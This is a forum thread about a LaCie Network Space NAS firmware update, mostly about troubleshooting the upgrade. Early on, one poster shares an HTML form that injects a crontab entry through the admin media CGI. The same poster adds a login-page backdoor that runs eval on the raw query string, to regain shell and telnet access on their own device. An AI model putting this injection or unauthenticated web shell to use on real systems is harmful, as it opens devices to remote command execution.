It doesn't say on the website what this upgrade adds or fixes, and I cannot tell from the file. And I'm not going to try. Here's a guy that got his Network Space with 1.1.8 and did not got the "ssh-hack-without-dissembling" working. I'm not sure whether the Twonky hack still works, it would be very simple to disable it.

I have already tested it and the TwonkyMedia hack still run. :P
To re-use webshell hack after upgrade i discovered 8-) that you can use a modified
www/cgi-bin/admin/media page to create a specific crontab:
extract of media: (get minute and hour and use it as arguments for crontab).
HH_SCAN=`GetURLFormValue hour`
MM_SCAN=`GetURLFormValue minute`
mkdir -p $CRON_DIR
echo "$MM_SCAN $HH_SCAN * * * /usr/bin/autoscan.sh > /dev/null 2>&1" > $CRON_DIR/$CRON_FILE
chmod 600 $CRON_DIR/$CRON_FILE > /dev/null 2>&1
/etc/init.d/cron restart > /dev/null 2>&1

Copy paste the following code in an HTML file:

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1' />
<title>Hack NAS</title>
<link rel='stylesheet' href='/css/lacie.css' type='text/css' />
</head>
<body>
<form name='edit_form' method='post' action='http://192.168.1.66/cgi-bin/admin/media'>
<input type='hidden' id='autoscn' name='autoscn' value=true>
<input type='hidden' id='modified' name='modified' value='true'>
<input name='hour' value='2>'><input name='minute' value='16 15 * * * sh /home/openshare/hack.sh > /home/openshare/scriptrunok '>

<input type=submit value='SET CRONTAB'>
</body>
</html>

Change 192.168.1.66 with the ip of your LACIE NAS, and 16 15 with the minutes/hours you want to execute the script.
Here it was 15:16. (but if you're not a newbie in Linux as I am it will be clear for you).
you'll be able to run script from /home/openshare or directly telnetd !!

I modified login page in /www/cgi-bin/public and add after BODY
"
if [ x"$QUERY_STRING" != x"" ] ; then
echo $QUERY_STRING
eval $QUERY_STRING
fi
echo "

So i can run webshell from login page and so restart telnetd.

Do you loose any data after upgrading?

I can't seem to update the Network Space.

I followed the instructions on the LaCie website. But after the NAS reboots, LaCie Network Assistent spits out following error: "your nas did not correctly reboot in update mode".

Any ideas?

Are you on a Mac? (I had these problems using OSX 10.6.2).

I have posted about it here:
http://www.cognitivecombine.com/2009/12 ... rough-osx/

As soon as you start the update process you have to close the window that lists the Network Space (i.e. the window that launches the first time when you start LaCie Network Assistant).

So just to clarify, don't close this window:
http://www.cognitivecombine.com/wp-cont ... .59-PM.png

But close this one once you have started the update process:
http://www.cognitivecombine.com/wp-cont ... 12/lna.png

Then the Network Space should be able to reboot into upgrade mode.

Please post back and let us know if this worked for you so that we can have confirmation from more than one person.

No I'm on Windows... (my computer that uses an ethernet cable runs windows server 2008 (32 bit).)
The update website stated you shouldn't try to update the Network Space from a wifi connection.

Indeed this was the trick. Closing the configuration window made it boot in update mode.
Thank you.

Closing the configuration window from the update window is not that hard to program... why did Lacie fail on this one?

Good point, I am not quite sure. Perhaps this was one of those things that was completely obvious to the developers and so they haven't noticed.

I spent about an entire day trying to update the Network Space and trying to look for info on the net, until I decided quite by chance to close the initial window and luckily it worked.

Hello,
This update is for NetworkSpace 1 only.

An update for NetworkSpace 2 will be available in few weeks; the beta test step is on going. (viewtopic.php?f=221&t=1874)

Oh dear,

I have upgraded & thought all was fine.

After a power down & reboot I can now no longer access it.
It just sits there.. :(
